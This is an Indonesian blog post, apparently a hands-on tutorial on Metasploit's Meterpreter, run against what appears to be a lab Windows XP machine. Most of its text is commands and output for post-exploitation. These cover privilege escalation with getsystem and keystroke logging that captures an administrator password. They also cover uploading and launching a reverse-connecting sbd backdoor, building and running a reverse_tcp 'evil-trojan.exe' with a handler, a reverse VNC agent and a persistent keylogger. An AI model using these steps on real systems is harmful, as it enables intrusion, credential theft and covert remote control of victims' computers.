Searching...
November 27, 2011

Messing With Meterpreter V3

Ini adalah versi ketiga dari Messing With Meterpreter (mengacau bersama meterpreter). Versi pertama dan kedua dapat anda temukan dalam daftar isi di blog ini.

Kali ini, saya akan memberikan beberapa perintah meterpreter yang sering saya gunakan dalam aktivitas exploitasi.

1. Information gathering + Privilege Escalation

a. sysinfo : berfungsi untuk menampilkan informasi dari system yang tereksploitasi.
Output:

meterpreter > sysinfo
Computer        : ROOT-11E5DB48A8
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32

b. pwd : berfungsi untuk menampilkan informasi process work directory.
Output:

meterpreter > pwd
C:\Program Files\Mozilla Firefox

c. getuid : berfungsi untuk menampilkan user id dari system yang tereksploitasi.
Output:

meterpreter > getuid 
Server username: ROOT-11E5DB48A8\Administrator

d. getsystem : berfungsi untuk mengangkat hak istimewa (privilege escalation) meterpreter.

meterpreter > getsystem 
...got system (via technique 1).

Setelah getsystem dijalankan, maka user id menjadi:

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM



e. ps : berfungsi untuk menampilkan daftar process yang sedang berjalan pada system yang terksploitasi.


f. migrate : berfungsi untuk memindahkan service meterpreter ke process lain.

meterpreter > migrate 632
[*] Migrating to 632...
[*] Migration completed successfully.

Note: saya berpindah ke process 632 a.k.a winlogon.exe

g.keyscan_start : berfungsi untuk merekam keystroke keyboard sesuai dengan process id meterpreter

meterpreter > keyscan_start
Starting the keystroke sniffer...

Note: keyscan_start dalam tutorial kali ini, saya merekan keystroke keyboard pada process 632 a.k.a winlogon.exe (sesuai dengan step f).

h. keyscan dump : berfungsi untuk menampilkan hasil dari keyscan_start

meterpreter > keyscan_dump
Dumping captured keystrokes...
red-dragon <Return> 



Note: saya berhasil mengambil password administrator =)

i. ipconfig : berfungsi untuk menampilkan configurasi IP milik system yang tereksploitasi

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0



AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:50:56:28:dc:a0
IP Address  : 172.16.60.128
Netmask     : 255.255.255.0




2. Perintah UPLOAD

Saya akan mencoba mengupload 2 backdoor ke dalam system. Sehingga saya dapat mengeksploitasi system tanpa perlu repot-repot.

a. upload Secure Back Door a.k.a sbd.exe

meterpreter > upload /pentest/windows-binaries/tools/sbd.exe C://WINDOWS//system32
[*] uploading  : /pentest/windows-binaries/tools/sbd.exe -> C://WINDOWS//system32
[*] uploaded   : /pentest/windows-binaries/tools/sbd.exe -> C://WINDOWS//system32\sbd.exe

Note: saya mengupload sbd.exe yang berada di direktory /pentest/windows-binaries/tools/sbd.exe ke direktoy C://WINDOWS//system32

Menjalankan Secure Back Door

meterpreter > execute -H -f "C:/WINDOWS/system32/sbd.exe -q -r 10 -k reddragon -e cmd -p 1000 192.168.1.3"
Process 3364 created.

Mengakses Secure Back Door

root@red-dragon:~# wine /pentest/windows-binaries/tools/sbd.exe -l -k reddragon -p 1000
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\TEMP\gDzCKIoJEf>


Note: saya berhasil masuk ke dalam konsol command prompt tanpa metasploit =)

b. Upload Trojan Horse!

Pertama, buat terlebih dahulu trojan horse milik anda.

root@red-dragon:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=2000 X > /root/evil-trojan.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.1.3", "LPORT"=>"2000"}

Note: Saya membuat trojan horse dalam direktori root, dimana victim akan menghubungi 192.168.1.3 a.k.a attacker pada port 2000. 

Upload Trojan Horse dengan konsol meterpreter.

meterpreter > upload /root/evil-trojan.exe C://WINDOWS//system32
[*] uploading  : /root/evil-trojan.exe -> C://WINDOWS//system32
[*] uploaded   : /root/evil-trojan.exe -> C://WINDOWS//system32\evil-trojan.exe

Menjalankan tugas multi handler untuk membuka meterpreter sesi baru.

Dalam konsol metasploit. Masukan perintah berikut:

msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LPORT 2000
LPORT => 2000
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.3:2000 
[*] Starting the payload handler...

Mengeksekusi evil-trojan.exe.

Note: kali ini, mengeksekusi evil-trojan.exe tidak bisa dilakukan dengan konsol meterpreter layaknya Secure Backdoor. Kita membutuhkan konsol shell a.k.a command prompt untuk mengeksekusinya. Dan pastikan process directory anda berada pada C:/WINDOWS/system32. Untuk mengecek process work directory, gunakan perintah pwd. Jika anda tidak berada pada pwd C:/WINDOWS/system32, lakukan tahap privilege escalation pada BAB 1 tahap E dan F. Ketika mengeksekusi perintah ps, perhatikan baris path. Dan temukan process yang bersumber dari direktori C:/WINDOWS/system32. Dalam kasus ini, saya melakukan migrate ke process 1072 a.k.a svchost.exe.

Buka command prompt dengan perintah:

meterpreter > shell
Process 136 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Kemudian eksekusi evil-trojan milik kita

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>evil-trojan.exe
evil-trojan.exe

Maka meterpreter sesi baru akan terbuka.

[*] Sending stage (752128 bytes) to 192.168.1.3
exit
[*] Meterpreter session 3 opened (192.168.1.3:2000 -> 192.168.1.3:47571) at 2011-11-27 10:45:25 +0700


3. Remote Desktop

Saya yakin anda mengincar yang satu ini. Langsung saja.

meterpreter > run vnc 
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.3 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\eZeNeVFVL.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.3:4545...
meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "root-11e5db48a8"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Same machine: preferring raw encoding


4. Key-logger V2

Kali ini berbeda dengan keyscan_start di tahap sebelumnya. Key-logger ini merekam setiap keystroke tanpa memandang pwd meteterpreter.

meterpreter > run keylogrecorder 
[*] explorer.exe Process found, migrating into 2532
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.1.3_20111127.3406.txt
[*] Recording 

Untuk melihat hasil Key-logger, buka file /root/.msf4/logs/scripts/keylogrecorder/192.168.1.3_20111127.3406.txt sesuai dengan output run keylogrecorder.



Mana yang anda suka? =)

created by:
red-dragon

supported by:
Blue Dragon

Loved by:
Yoshephine Handini

9 comment:

Post a Comment

 
Back to top!